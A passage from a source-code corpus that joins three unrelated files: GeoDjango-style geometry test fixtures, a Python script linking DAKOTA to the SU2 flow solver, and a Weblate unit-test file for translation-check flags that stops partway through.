110,110</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs><gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>110,110 100,180 120,180 110,110</gml:coordinates></gml:LinearRing></gml:innerBoundaryIs></gml:Polygon></gml:polygonMember><gml:polygonMember><gml:Polygon><gml:outerBoundaryIs><gml:LinearRing><gml:coordinates>110,110 150,20 70,20 110,110</gml:coordinates></gml:LinearRing></gml:outerBoundaryIs><gml:innerBoundaryIs><gml:LinearRing><gml:coordinates>110,110 120,40 100,40 110,110</gml:coordinates></gml:LinearRing></gml:innerBoundaryIs></gml:Polygon></gml:polygonMember></gml:MultiPolygon>'),
TestGeom('GEOMETRYCOLLECTION (POINT (110 260),LINESTRING (110 0,110 60))', ewkt='GEOMETRYCOLLECTION (POINT (110.0000000000000000 260.0000000000000000), LINESTRING (110.0000000000000000 0.0000000000000000, 110.0000000000000000 60.0000000000000000))', kml='<MultiGeometry><Point><coordinates>110.0,260.0,0</coordinates></Point><LineString><coordinates>110.0,0.0,0 110.0,60.0,0</coordinates></LineString></MultiGeometry>', gml='<gml:GeometryCollection><gml:geometryMember><gml:Point><gml:coordinates>110,260</gml:coordinates></gml:Point></gml:geometryMember><gml:geometryMember><gml:LineString><gml:coordinates>110,0 110,60</gml:coordinates></gml:LineString></gml:geometryMember></gml:GeometryCollection>'),
)
# Errors
errors = (TestGeom('GEOMETR##!@#%#............a32515', bad=True, hex=False),
TestGeom('Foo.Bar', bad=True, hex=False),
TestGeom('POINT (5, 23)', bad=True, hex=False),
TestGeom('AAABBBDDDAAD##@#1113511111-098111111111111111533333333333333', bad=True, hex=True),
TestGeom('FFFFFFFFFFFFFFFFF1355555555555555555565111', bad=True, hex=True),
TestGeom('', bad=True, hex=False),
)
# Polygons
polygons = (TestGeom('POLYGON ((0 0, 0 100, 100 100, 100 0, 0 0), (10 10, 10 90, 90 90, 90 10, 10 10))',
n_i=1, ext_ring_cs=((0, 0), (0, 100), (100, 100), (100, 0), (0, 0)), n_p=10, area=3600.0, centroid=(50., 50.),
),
TestGeom('POLYGON ((0 0, 0 100, 100 100, 100 0, 0 0), (10 10, 10 20, 20 20, 20 10, 10 10), (80 80, 80 90, 90 90, 90 80, 80 80))',
n_i=2, ext_ring_cs=((0, 0), (0, 100), (100, 100), (100, 0), (0, 0)), n_p=15, area=9800.0, centroid=(50., 50.),
),
TestGeom('POLYGON ((0 0, 0 100, 100 100, 100 0, 0 0))',
n_i=0, ext_ring_cs=((0, 0), (0, 100), (100, 100), (100, 0), (0, 0)), n_p=5, area=10000.0, centroid=(50., 50.),
),
TestGeom('POLYGON ((-95.3848703124799471 29.7056021479768511, -95.3851905195191847 29.7046588196500281, -95.3859356966379011 29.7025053545605502, -95.3860723000647539 29.7020963367038391, -95.3871517697222089 29.6989779021280995, -95.3865578518265522 29.6990856888057202, -95.3862634205175226 29.6999471753441782, -95.3861991779541967 29.6999591988978615, -95.3856773799358137 29.6998323107113578, -95.3856209915427229 29.6998005235473741, -95.3855833545501639 29.6996619391729801, -95.3855776331865002 29.6996232659570047, -95.3850162731712885 29.6997236706530536, -95.3831047357410284 29.7000847603095082, -95.3829800724914776 29.7000676365023502, -95.3828084594470909 29.6999969684031200, -95.3828131504821499 29.6999090511531065, -95.3828022942979601 29.6998152117366025, -95.3827893930918833 29.6997790953076759, -95.3825174668099862 29.6998267772748825, -95.3823521544804862 29.7000451723151606, -95.3820491918785223 29.6999682034582335, -95.3817932841505893 29.6999640407204772, -95.3815438924600443 29.7005983712500630, -95.3807812390843424 29.7007538492921590, -95.3778578936435935 29.7012966201172048, -95.3770817300034679 29.7010555145969093, -95.3772763716395957 29.7004995005932031, -95.3769891024414420 29.7005797730360186, -95.3759855007185990 29.7007754783987821, -95.3759516423090474 29.7007305400669388, -95.3765252155960042 29.6989549173240874, -95.3766842746727832 29.6985134987163164, -95.3768510987262914 29.6980530300744938, -95.3769198676258014 29.6977137204527573, -95.3769616670751930 29.6973351617272172, -95.3770309229297766 29.6969821084304186, -95.3772352596880637 29.6959751305871613, -95.3776232419333354 29.6945439060847463, -95.3776849628727064 29.6943364710766069, -95.3779699491714723 29.6926548349458947, -95.3781945479573494 29.6920088336742545, -95.3785807118394189 29.6908279316076005, -95.3787441368896651 29.6908846275832197, -95.3787903214163890 29.6907152912461640, -95.3791765069353659 29.6893335376821526, -95.3794935959513026 29.6884781789101595, -95.3796592071232112 29.6880066681407619, -95.3799788182090111 29.6873687353035081, -95.3801545516183893 29.6868782380716993, -95.3801258908302145 29.6867756621337762, -95.3801104284899566 29.6867229678809572, -95.3803803523746154 29.6863753372986459, -95.3821028558287622 29.6837392961470421, -95.3827289584682205 29.6828097375216160, -95.3827494698109035 29.6790739156259278, -95.3826022014838486 29.6776502228345507, -95.3825047356438063 29.6765773006280753, -95.3823473035336917 29.6750405250369127, -95.3824540163482055 29.6750076408228587, -95.3838984230304305 29.6745679207378679, -95.3916547074937426 29.6722459226508377, -95.3926154662749468 29.6719609085105489, -95.3967246645118081 29.6707316485589736, -95.3974588054406780 29.6705065336410989, -95.3978523748756828 29.6703795547846845, -95.3988598162279970 29.6700874981900853, -95.3995628600665952 29.6698505300412414, -95.4134721665944170 29.6656841279906232, -95.4143262068232616 29.6654291174019278, -95.4159685142480214 29.6649750989232288, -95.4180067396277565 29.6643253024318021, -95.4185886692196590 29.6641482768691063, -95.4234155309609662 29.6626925393704788, -95.4287785503196346 29.6611023620959706, -95.4310287312749352 29.6604222580752648, -95.4320295629628959 29.6603361318136720, -95.4332899683975739 29.6600560661713608, -95.4342675748811047 29.6598454934599900, -95.4343110414310871 29.6598411486215490, -95.4345576779282538 29.6598147020668499, -95.4348823041721630 29.6597875803673112, -95.4352827715209457 29.6597762346946681, -95.4355290431309982 29.6597827926562374, -95.4359197997999331 29.6598014511782715, -95.4361907884752156 29.6598444333523368, -95.4364608955807228 29.6598901433108217, -95.4367250147512323 29.6599494499910712, -95.4364898759758091 29.6601880616540186, -95.4354501111810691 29.6616378572201107, -95.4381459623171224 29.6631265631655126, -95.4367852490863129 29.6642266600024023, -95.4370040894557263 29.6643425389568769, -95.4367078350812648 29.6645492592343238, -95.4366081749871285 29.6646291473027297, -95.4358539359938192 29.6652308742342932, -95.4350327668927889 29.6658995989314462, -95.4350580905272921 29.6678812477895271, -95.4349710541447536 29.6680054925936965, -95.4349500440473548 29.6671410080890006, -95.4341492724148850 29.6678790545191688, -95.4340248868274728 29.6680353198492135, -95.4333227845797438 29.6689245624945990, -95.4331325652123326 29.6691616138940901, -95.4321314741096955 29.6704473333237253, -95.4320435792664341 29.6702578985411982, -95.4320147929883547 29.6701800936425109, -95.4319764538662980 29.6683246590817085, -95.4317490976340679 29.6684974372577166, -95.4305958185342718 29.6694049049170374, -95.4296600735653016 29.6701723430938493, -95.4284928989940937 29.6710931793380972, -95.4274630532378580 29.6719378813640091, -95.4273056811974811 29.6720684984625791, -95.4260554084574864 29.6730668861566969, -95.4253558063699643 29.6736342467365724, -95.4249278826026028 29.6739557343648919, -95.4248648873821423 29.6745400910786152, -95.4260016131471929 29.6750987014005858, -95.4258567183010911 29.6753452063069929, -95.4260238081486847 29.6754322077221353, -95.4258707374502393 29.6756647377294307, -95.4257951755816691 29.6756407098663360, -95.4257701599566985 29.6761077719536068, -95.4257726684792260 29.6761711204603955, -95.4257980187195614 29.6770219651929423, -95.4252712669032519 29.6770161558853758, -95.4249234392992065 29.6770068683962300, -95.4249574272905789 29.6779707498635759, -95.4244725881033702 29.6779825646764159, -95.4222269476429545 29.6780711474441716, -95.4223032371999267 29.6796029391538809, -95.4239133706588945 29.6795331493690355, -95.4224579084327331 29.6813706893847780, -95.4224290108823965 29.6821953228763924, -95.4230916478977349 29.6822130268724109, -95.4222928279595521 29.6832041816675343, -95.4228763710016352 29.6832087677714505, -95.4223401691637179 29.6838987872753748, -95.4211655906087088 29.6838784024852984, -95.4201984153205558 29.6851319258758082, -95.4206156387716362 29.6851623398125319, -95.4213438084897660 29.6851763011334739, -95.4212071118618752 29.6853679931624974, -95.4202651399651245 29.6865313962980508, -95.4172061157659783 29.6865816431043932, -95.4182217951255183 29.6872251197301544, -95.4178664826439160 29.6876750901471631, -95.4180678442928780 29.6877960336377207, -95.4188763472917572 29.6882826379510938, -95.4185374500596311 29.6887137897831934, -95.4182121713132290 29.6885097429738813, -95.4179857231741551 29.6888118367840086, -95.4183106010563620 29.6890048676118212, -95.4179489865331334 29.6894546700979056, -95.4175581746284820 29.6892323606815438, -95.4173439957341571 29.6894990139807007, -95.4177411199311081 29.6897435034738422, -95.4175789200209721 29.6899207529979208, -95.4170598559864800 29.6896042165807508, -95.4166733682539814 29.6900891174451367, -95.4165941362704331 29.6900347214235047, -95.4163537218065301 29.6903529467753238, -95.4126843270708775 29.6881086357212780, -95.4126604121378392 29.6880942378803496, -95.4126672298953338 29.6885951670109982, -95.4126680884821923 29.6887052446594275, -95.4158080137241882 29.6906382377959339, -95.4152061403821961 29.6910871045531586, -95.4155842583188161 29.6917382915894308, -95.4157426793520358 29.6920726941677096, -95.4154520563662203 29.6922052332446427, -95.4151389936167078 29.6923261661269571, -95.4148649784384872 29.6924343866430256, -95.4144051352401590 29.6925623927348106, -95.4146792019416665 29.6926770338507744, -95.4148824479948985 29.6928117893696388, -95.4149851734360226 29.6929823719519774, -95.4140436551925291 29.6929626643100946, -95.4140465993023241 29.6926545917254892, -95.4137269186733334 29.6927395764256090, -95.4137372859685513 29.6935432485666624, -95.4135702836218655 29.6933186678088283, -95.4133925235973237 29.6930415229852152, -95.4133017035615580 29.6928685062036166, -95.4129588921634593 29.6929391128977862, -95.4125107395559695 29.6930481664661485, -95.4102647423187307 29.6935850183258019, -95.4081931340840157 29.6940907430947760, -95.4078783596459772 29.6941703429951609, -95.4049213975000043 29.6948723732981961, -95.4045944244127071 29.6949626434239207, -95.4045865139788134 29.6954109019001358, -95.4045953345484037 29.6956972800496963, -95.4038879332535146 29.6958296089365490, -95.4040366394459340 29.6964389004769842, -95.4032774779020798 29.6965643341263892, -95.4026066501239853 29.6966646227683881, -95.4024991226393837 29.6961389766619703, -95.4011781398631911 29.6963566063186377, -95.4011524097636112 29.6962596176762190, -95.4018184046368276 29.6961399466727336, -95.4016995838361908 29.6956442609415099, -95.4007100753964608 29.6958900524002978, -95.4008032469935188 29.6962639900781404, -95.3995660267125487 29.6965636449370329, -95.3996140564775601 29.6967877962763644, -95.3996364430014410 29.6968901984825280, -95.3984003269631842 29.6968679634805746, -95.3981442026887265 29.6983660679730335, -95.3980178461957706 29.6990890276252415, -95.3977097967130163 29.7008526152273049, -95.3962347157626027 29.7009697553607630, -95.3951949050136250 29.7004740386619019, -95.3957564950617183 29.6990281830553187, -95.3965927101519924 29.6968771129030706, -95.3957496517238184 29.6970800358387095, -95.3957720559467361 29.6972264611230727, -95.3957391586571788 29.6973548894558732, -95.3956286413405365 29.6974949857280883, -95.3955111053256957 29.6975661086270186, -95.3953215342724121 29.6976022763384790, -95.3951795558443365 29.6975846977491038, -95.3950369632041060 29.6975175779330200, -95.3949401089966500 29.6974269267953304, -95.3948740281415581 29.6972903308506346, -95.3946650813866910 29.6973397326847923, -95.3947654059391112 29.6974882560192022, -95.3949627316619768 29.6980355864961858, -95.3933200807862249 29.6984590863712796, -95.3932606497523494 29.6984464798710839, -95.3932983699113350 29.6983154306484352, -95.3933058014696655 29.6982165816983610, -95.3932946347785133 29.6981089778195759, -95.3931780601756287 29.6977068906794841, -95.3929928222970602 29.6977541771878180, -95.3930873169846478 29.6980676264932946, -95.3932743746374570 29.6981249406449663, -95.3929512584706316 29.6989526513922222, -95.3919850280655197 29.7014358632108646, -95.3918950918929056 29.7014169320765724, -95.3916928317890296 29.7019232352846423, -95.3915424614970959 29.7022988712928289, -95.3901530441668939 29.7058519502930061, -95.3899656322116698 29.7059156823562418, -95.3897628748670883 29.7059900058266777, -95.3896062677805787 29.7060738276384946, -95.3893941800512266 29.7061891695242046, -95.3892150365492455 29.7062641292949436, -95.3890502563035199 29.7063339729630940, -95.3888717930715586 29.7063896908080736, -95.3886925428988945 29.7064453871994978, -95.3885376849411983 29.7064797304524149, -95.3883284158984139 29.7065153575050189, -95.3881046767627794 29.7065368368267357, -95.3878809284696132 29.7065363048447537, -95.3876046356120924 29.7065288525102424, -95.3873060894974714 29.7064822806001452, -95.3869851943158409 29.7063993367575350, -95.3865967896568065 29.7062870572919202, -95.3861785624983156 29.7061492099008184, -95.3857375009733488 29.7059887337478798, -95.3854573290902152 29.7058683664514618, -95.3848703124799471 29.7056021479768511))',
n_i=0, ext_ring_cs=False, n_p=264, area=0.00129917360654, centroid=(-95.403569179437341, 29.681772571690402),
),
)
# MultiPolygons
multipolygons = (TestGeom('MULTIPOLYGON (((100 20, 180 20, 180 100, 100 100, 100 20)), ((20 100, 100 100, 100 180, 20 180, 20 100)), ((100 180, 180 180, 180 260, 100 260, 100 180)), ((180 100, 260 100, 260 180, 180 180, 180 100)))', valid=True, num_geom=4, n_p=20),
TestGeom('MULTIPOLYGON (((60 300, 320 220, 260 60, 60 100, 60 300)), ((60 300, 320 220, 260 60, 60 100, 60 300)))', valid=False),
TestGeom('MULTIPOLYGON (((180 60, 240 160, 300 60, 180 60)), ((80 80, 180 60, 160 140, 240 160, 360 140, 300 60, 420 100, 320 280, 120 260, 80 80)))', valid=True, num_geom=2, n_p=14),
)
# Points
points = (TestGeom('POINT (5 23)', x=5.0, y=23.0, centroid=(5.0, 23.0)),
TestGeom('POINT (-95.338492 29.723893)', x=-95.338492, y=29.723893, centroid=(-95.338492, 29.723893)),
TestGeom('POINT(1.234 5.678)', x=1.234, y=5.678, centroid=(1.234, 5.678)),
TestGeom('POINT(4.321 8.765)', x=4.321, y=8.765, centroid=(4.321, 8.765)),
TestGeom('POINT(10 10)', x=10, y=10, centroid=(10., 10.)),
TestGeom('POINT (5 23 8)', x=5.0, y=23.0, z=8.0, centroid=(5.0, 23.0)),
)
# MultiPoints
multipoints = (TestGeom('MULTIPOINT(10 10, 20 20 )', n_p=2, points=((10., 10.), (20., 20.)), centroid=(15., 15.)),
TestGeom('MULTIPOINT(10 10, 20 20, 10 20, 20 10)',
n_p=4, points=((10., 10.), (20., 20.), (10., 20.), (20., 10.)),
centroid=(15., 15.)),
)
# LineStrings
linestrings = (TestGeom('LINESTRING (60 180, 120 100, 180 180)', n_p=3, centroid=(120, 140), tup=((60, 180), (120, 100), (180, 180))),
TestGeom('LINESTRING (0 0, 5 5, 10 5, 10 10)', n_p=4, centroid=(6.1611652351681556, 4.6966991411008934), tup=((0, 0), (5, 5), (10, 5), (10, 10)),),
)
# Linear Rings
linearrings = (TestGeom('LINEARRING (649899.3065171393100172 4176512.3807915160432458, 649902.7294133581453934 4176512.7834989596158266, 649906.5550170192727819 4176514.3942507002502680, 649910.5820134161040187 4176516.0050024418160319, 649914.4076170771149918 4176518.0184616246260703, 649917.2264131171396002 4176519.4278986593708396, 649920.0452871860470623 4176521.6427505780011415, 649922.0587463703704998 4176522.8507948759943247, 649924.2735982896992937 4176524.4616246484220028, 649926.2870574744883925 4176525.4683542405255139, 649927.8978092158213258 4176526.8777912775985897, 649929.3072462501004338 4176528.0858355751261115, 649930.1126611357321963 4176529.4952726080082357, 649927.4951798024121672 4176506.9444361114874482, 649899.3065171393100172 4176512.3807915160432458)', n_p=15),
)
# MultiLineStrings
multilinestrings = (TestGeom('MULTILINESTRING ((0 0, 0 100), (100 0, 100 100))', n_p=4, centroid=(50, 50), tup=(((0, 0), (0, 100)), ((100, 0), (100, 100)))),
TestGeom('MULTILINESTRING ((20 20, 60 60), (20 -20, 60 -60), (-20 -20, -60 -60), (-20 20, -60 60), (-80 0, 0 80, 80 0, 0 -80, -80 0), (-40 20, -40 -20), (-20 40, 20 40), (40 20, 40 -20), (20 -40, -20 -40))',
n_p=21, centroid=(0, 0), tup=(((20., 20.), (60., 60.)), ((20., -20.), (60., -60.)), ((-20., -20.), (-60., -60.)), ((-20., 20.), (-60., 60.)), ((-80., 0.), (0., 80.), (80., 0.), (0., -80.), (-80., 0.)), ((-40., 20.), (-40., -20.)), ((-20., 40.), (20., 40.)), ((40., 20.), (40., -20.)), ((20., -40.), (-20., -40.))))
)
# ====================================================
# Topology Operations
topology_geoms = ( (TestGeom('POLYGON ((-5.0 0.0, -5.0 10.0, 5.0 10.0, 5.0 0.0, -5.0 0.0))'),
TestGeom('POLYGON ((0.0 -5.0, 0.0 5.0, 10.0 5.0, 10.0 -5.0, 0.0 -5.0))')
),
(TestGeom('POLYGON ((2 0, 18 0, 18 15, 2 15, 2 0))'),
TestGeom('POLYGON ((10 1, 11 3, 13 4, 15 6, 16 8, 16 10, 15 12, 13 13, 11 12, 10 10, 9 12, 7 13, 5 12, 4 10, 4 8, 5 6, 7 4, 9 3, 10 1))'),
),
)
intersect_geoms = ( TestGeom('POLYGON ((5 5,5 0,0 0,0 5,5 5))'),
TestGeom('POLYGON ((10 1, 9 3, 7 4, 5 6, 4 8, 4 10, 5 12, 7 13, 9 12, 10 10, 11 12, 13 13, 15 12, 16 10, 16 8, 15 6, 13 4, 11 3, 10 1))'),
)
union_geoms = ( TestGeom('POLYGON ((-5 0,-5 10,5 10,5 5,10 5,10 -5,0 -5,0 0,-5 0))'),
TestGeom('POLYGON ((2 0, 2 15, 18 15, 18 0, 2 0))'),
)
diff_geoms = ( TestGeom('POLYGON ((-5 0,-5 10,5 10,5 5,0 5,0 0,-5 0))'),
TestGeom('POLYGON ((2 0, 2 15, 18 15, 18 0, 2 0), (10 1, 11 3, 13 4, 15 6, 16 8, 16 10, 15 12, 13 13, 11 12, 10 10, 9 12, 7 13, 5 12, 4 10, 4 8, 5 6, 7 4, 9 3, 10 1))'),
)
sdiff_geoms = ( TestGeom('MULTIPOLYGON (((-5 0,-5 10,5 10,5 5,0 5,0 0,-5 0)),((0 0,5 0,5 5,10 5,10 -5,0 -5,0 0)))'),
TestGeom('POLYGON ((2 0, 2 15, 18 15, 18 0, 2 0), (10 1, 11 3, 13 4, 15 6, 16 8, 16 10, 15 12, 13 13, 11 12, 10 10, 9 12, 7 13, 5 12, 4 10, 4 8, 5 6, 7 4, 9 3, 10 1))'),
)
relate_geoms = ( (TestGeom('MULTIPOINT(80 70, 20 20, 200 170, 140 120)'),
TestGeom('MULTIPOINT(80 170, 140 120, 200 80, 80 70)'),
'0F0FFF0F2', True,),
(TestGeom('POINT(20 20)'), TestGeom('POINT(40 60)'),
'FF0FFF0F2', True,),
(TestGeom('POINT(110 110)'), TestGeom('LINESTRING(200 200, 110 110, 200 20, 20 20, 110 110, 20 200, 200 200)'),
'0FFFFF1F2', True,),
(TestGeom('MULTILINESTRING((20 20, 90 20, 170 20), (90 20, 90 80, 90 140))'),
TestGeom('MULTILINESTRING((90 20, 170 100, 170 140), (130 140, 130 60, 90 20, 20 90, 90 20))'),
'FF10F0102', True,),
)
buffer_geoms = ( (TestGeom('POINT(0 0)'),
TestGeom('POLYGON ((5 0,4.903926402016153 -0.97545161008064,4.619397662556435 -1.913417161825447,4.157348061512728 -2.777851165098009,3.53553390593274 -3.535533905932735,2.777851165098015 -4.157348061512724,1.913417161825454 -4.619397662556431,0.975451610080648 -4.903926402016151,0.000000000000008 -5.0,-0.975451610080632 -4.903926402016154,-1.913417161825439 -4.619397662556437,-2.777851165098002 -4.157348061512732,-3.53553390593273 -3.535533905932746,-4.157348061512719 -2.777851165098022,-4.619397662556429 -1.913417161825462,-4.903926402016149 -0.975451610080656,-5.0 -0.000000000000016,-4.903926402016156 0.975451610080624,-4.619397662556441 1.913417161825432,-4.157348061512737 2.777851165097995,-3.535533905932752 3.535533905932723,-2.777851165098029 4.157348061512714,-1.913417161825468 4.619397662556426,-0.975451610080661 4.903926402016149,-0.000000000000019 5.0,0.975451610080624 4.903926402016156,1.913417161825434 4.61939766255644,2.777851165097998 4.157348061512735,3.535533905932727 3.535533905932748,4.157348061512719 2.777851165098022,4.619397662556429 1.91341716182546,4.90392640201615 0.975451610080652,5 0))'),
5.0, 8),
(TestGeom('POLYGON((0 0, 10 0, 10 10, 0 10, 0 0))'),
TestGeom('POLYGON ((-2 0,-2 10,-1.961570560806461 10.390180644032258,-1.847759065022573 10.765366864730179,-1.662939224605091 11.111140466039204,-1.414213562373095 11.414213562373096,-1.111140466039204 11.662939224605092,-0.765366864730179 11.847759065022574,-0.390180644032256 11.961570560806461,0 12,10 12,10.390180644032256 11.961570560806461,10.765366864730179 11.847759065022574,11.111140466039204 11.66293922460509,11.414213562373096 11.414213562373096,11.66293922460509 11.111140466039204,11.847759065022574 10.765366864730179,11.961570560806461 10.390180644032256,12 10,12 0,11.961570560806461 -0.390180644032256,11.847759065022574 -0.76536686473018,11.66293922460509 -1.111140466039204,11.414213562373096 -1.414213562373095,11.111140466039204 -1.66293922460509,10.765366864730179 -1.847759065022573,10.390180644032256 -1.961570560806461,10 -2,0.0 -2.0,-0.390180644032255 -1.961570560806461,-0.765366864730177 -1.847759065022575,-1.1111404660392 -1.662939224605093,-1.41421356237309 -1.4142135623731,-1.662939224605086 -1.111140466039211,-1.84775906502257 -0.765366864730189,-1.961570560806459 -0.390180644032268,-2 0))'),
2.0, 8),
)
json_geoms = (TestGeom('POINT(100 0)', json='{ "type": "Point", "coordinates": [ 100.000000, 0.000000 ] }'),
TestGeom('POLYGON((0 0, -10 0, -10 -10, 0 -10, 0 0))', json='{ "type": "Polygon", "coordinates": [ [ [ 0.000000, 0.000000 ], [ -10.000000, 0.000000 ], [ -10.000000, -10.000000 ], [ 0.000000, -10.000000 ], [ 0.000000, 0.000000 ] ] ] }'),
TestGeom('MULTIPOLYGON(((102 2, 103 2, 103 3, 102 3, 102 2)), ((100.0 0.0, 101.0 0.0, 101.0 1.0, 100.0 1.0, 100.0 0.0), (100.2 0.2, 100.8 0.2, 100.8 0.8, 100.2 0.8, 100.2 0.2)))', json='{ "type": "MultiPolygon", "coordinates": [ [ [ [ 102.000000, 2.000000 ], [ 103.000000, 2.000000 ], [ 103.000000, 3.000000 ], [ 102.000000, 3.000000 ], [ 102.000000, 2.000000 ] ] ], [ [ [ 100.000000, 0.000000 ], [ 101.000000, 0.000000 ], [ 101.000000, 1.000000 ], [ 100.000000, 1.000000 ], [ 100.000000, 0.000000 ] ], [ [ 100.200000, 0.200000 ], [ 100.800000, 0.200000 ], [ 100.800000, 0.800000 ], [ 100.200000, 0.800000 ], [ 100.200000, 0.200000 ] ] ] ] }'),
TestGeom('GEOMETRYCOLLECTION(POINT(100 0),LINESTRING(101.0 0.0, 102.0 1.0))',
json='{ "type": "GeometryCollection", "geometries": [ { "type": "Point", "coordinates": [ 100.000000, 0.000000 ] }, { "type": "LineString", "coordinates": [ [ 101.000000, 0.000000 ], [ 102.000000, 1.000000 ] ] } ] }',
),
TestGeom('MULTILINESTRING((100.0 0.0, 101.0 1.0),(102.0 2.0, 103.0 3.0))',
json="""
{ "type": "MultiLineString",
"coordinates": [
[ [100.0, 0.0], [101.0, 1.0] ],
[ [102.0, 2.0], [103.0, 3.0] ]
]
}
""",
not_equal=True,
),
)
# For testing HEX(EWKB).
ogc_hex = '01010000000000000000000000000000000000F03F'
# `SELECT ST_AsHEXEWKB(ST_GeomFromText('POINT(0 1)', 4326));`
hexewkb_2d = '0101000020E61000000000000000000000000000000000F03F'
# `SELECT ST_AsHEXEWKB(ST_GeomFromEWKT('SRID=4326;POINT(0 1 2)'));`
hexewkb_3d = '01010000A0E61000000000000000000000000000000000F03F0000000000000040'
| apache-2.0 |
padronas/research_scripts | SU2Dakota/SU2_dakota_interface.py | 1 | 3484 | #!/usr/bin/env python
# Read DAKOTA parameters file standard format and call SU2
# python module for analysis and return the results file to Dakota.
# DAKOTA will execute this script as
# SU2_dakota_interface.py params.in results.out
# so sys.argv[1] will be the parameters file and
# sys.argv[2] will be the results file to return to DAKOTA
# necessary python modules
import sys
import re
import os
import SU2
import SU2Dakota.interface as interface
def main():
# -----------------------
# Check DAKOTA input file
# -----------------------
########## Modify file name for your problem ##########
dakota_input_file = 'dakota_NACA0012_opt.in'
interface.check_dakota_input(dakota_input_file)
# ----------------------------
# Parse DAKOTA parameters file
# ----------------------------
paramsfile = sys.argv[1]
paramsdict = interface.parse_dakota_parameters_file(paramsfile)
# ------------------------
# Set up application (SU2)
# ------------------------
########## Modify here for your problem ##########
record_name = 'record.json' # Keeps track of the simulations
config_filename = 'inv_NACA0012_opt.cfg' # SU2 config
config_filename = '../' + config_filename # Because running dakota with folders
config = SU2.io.Config(config_filename)
config.NUMBER_PART = 16 # Number of processors to run simulation
# Specify uncertain variables
nu_var = 1
uncertain_vars = {}
# the KEY has to be a valid SU2 configuration option
uncertain_vars['MACH_NUMBER'] = float(paramsdict['Mach'])
# Specify number of design variables
#nd_var = 38
#design_vars = []
# for i in range(1,nd_var+1):
# var = 'x' + str(i)
# design_vars.append(float(paramsdict[var]))
# Optimization objective
# config.OPT_OBJECTIVE = 'DRAG' Maybe have this in the config file itself
### Dictionary for passing to your application (SU2) ###
eval_id = int(paramsdict['eval_id'])
active_set_vector_func = int(paramsdict['ASV_1:Cd'])
#active_set_vector_func = int(paramsdict['ASV_1:obj_fn'])
#active_set_vector_cons = int(paramsdict['ASV_2:nln_ineq_con_1'])
active_set_vector = [active_set_vector_func]
#active_set_vector = [active_set_vector_func,active_set_vector_cons]
### Modify the paramsdict names to match those of the params file ###
# rough error checking
try:
nu_var
except NameError:
nu_var = 0
uncertain_vars = {}
try:
nd_var
except NameError:
nd_var = 0
design_vars = []
nvar = nd_var + nu_var
num_vars = 0
if ('variables' in paramsdict):
num_vars = int(paramsdict['variables'])
if (num_vars != nvar):
print 'Error: Simulation expected ' + str(nvar) + ' variables, found ' \
+ str(num_vars) + ' variables.'
sys.exit()
# -----------------------------
# Execute the application (SU2)
# -----------------------------
print "Running SU2..."
resultsdict = interface.run(record_name, config,
eval_id, active_set_vector, design_vars, uncertain_vars)
print "SU2 complete."
# ----------------------------
# Return the results to DAKOTA
# ----------------------------
resultsfile = sys.argv[2]
interface.write_dakota_results_file(
resultsfile, resultsdict, paramsdict, active_set_vector)
if __name__ == '__main__':
main()
| mit |
nijel/weblate | weblate/checks/tests/test_flags.py | 2 | 6281 | #
# Copyright © 2012 - 2021 Michal Čihař <michal@cihar.com>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
from django.core.exceptions import ValidationError
from django.test import SimpleTestCase
from weblate.checks.flags import TYPED_FLAGS, TYPED_FLAGS_ARGS, Flags
class FlagTest(SimpleTestCase):
def test_parse(self):
self.assertEqual(Flags("foo, bar").items(), {"foo", "bar"})
def test_parse_blank(self):
self.assertEqual(Flags("foo, bar, ").items(), {"foo", "bar"})
def test_parse_alias(self):
self.assertEqual(
Flags("foo, md-text, bar, markdown-text").items(), {"foo", "bar", "md-text"}
)
def test_iter(self):
self.assertEqual(sorted(Flags("foo, bar")), ["bar", "foo"])
def test_parse_empty(self):
self.assertEqual(Flags("").items(), set())
def test_merge(self):
self.assertEqual(Flags({"foo"}, {"bar"}).items(), {"foo", "bar"})
def test_merge_prefix(self):
self.assertEqual(Flags({("foo", "1")}, {("foo", "2")}).items(), {("foo", "2")})
def test_values(self):
flags = Flags("placeholders:bar:baz")
self.assertEqual(flags.get_value("placeholders"), ["bar", "baz"])
def test_quoted_values(self):
flags = Flags(r"""placeholders:"bar: \"value\"":'baz \'value\''""")
self.assertEqual(
flags.get_value("placeholders"), ['bar: "value"', "baz 'value'"]
)
self.assertEqual(
flags.format(), r'''placeholders:"bar: \"value\"":"baz 'value'"'''
)
flags = Flags(r'regex:"((?:@:\(|\{)[^\)\}]+(?:\)|\}))"')
self.assertEqual(flags.format(), r'regex:"((?:@:\(|\{)[^\)\}]+(?:\)|\}))"')
def test_validate_value(self):
with self.assertRaises(ValidationError):
Flags("max-length:x").validate()
Flags("max-length:30").validate()
def test_validate_name(self):
with self.assertRaises(ValidationError):
Flags("invalid-check-name").validate()
with self.assertRaises(ValidationError):
Flags("invalid-check-name:1").validate()
Flags("ignore-max-length").validate()
def test_typed(self):
self.assertEqual(TYPED_FLAGS.keys(), TYPED_FLAGS_ARGS.keys())
def test_remove(self):
flags = Flags("placeholders:bar:baz, foo:1, bar")
flags.remove("foo")
self.assertEqual(flags.items(), {("placeholders", "bar", "baz"), "bar"})
flags.remove("bar")
self.assertEqual(flags.items(), {("placeholders", "bar", "baz")})
def test_empty_value(self):
flags = Flags("regex:")
regex = flags.get_value("regex")
self.assertEqual(regex.pattern, "")
flags = Flags("regex:,bar")
regex = flags.get_value("regex")
self.assertEqual(regex.pattern, "")
def test_regex(self):
flags = Flags("regex:.*")
regex = flags.get_value("regex")
self.assertEqual(regex.pattern, ".*")
flags = Flags('regex:r".*"')
regex = flags.get_value("regex")
self.assertEqual(regex.pattern, ".*")
def test_regex_value(self):
flags = Flags("placeholders:r")
self.assertEqual(flags.get_value("placeholders"), ["r"])
flags = Flags("placeholders:r:r")
self.assertEqual(flags.get_value("placeholders"), ["r", "r"])
flags = Flags("placeholders:r,r")
self.assertEqual(flags.get_value("placeholders"), ["r"])
flags = Flags('placeholders:r".*"')
values = flags.get_value("placeholders")
self.assertEqual(len(values), 1)
self.assertEqual(values[0].pattern, ".*")
def test_whitespace(self):
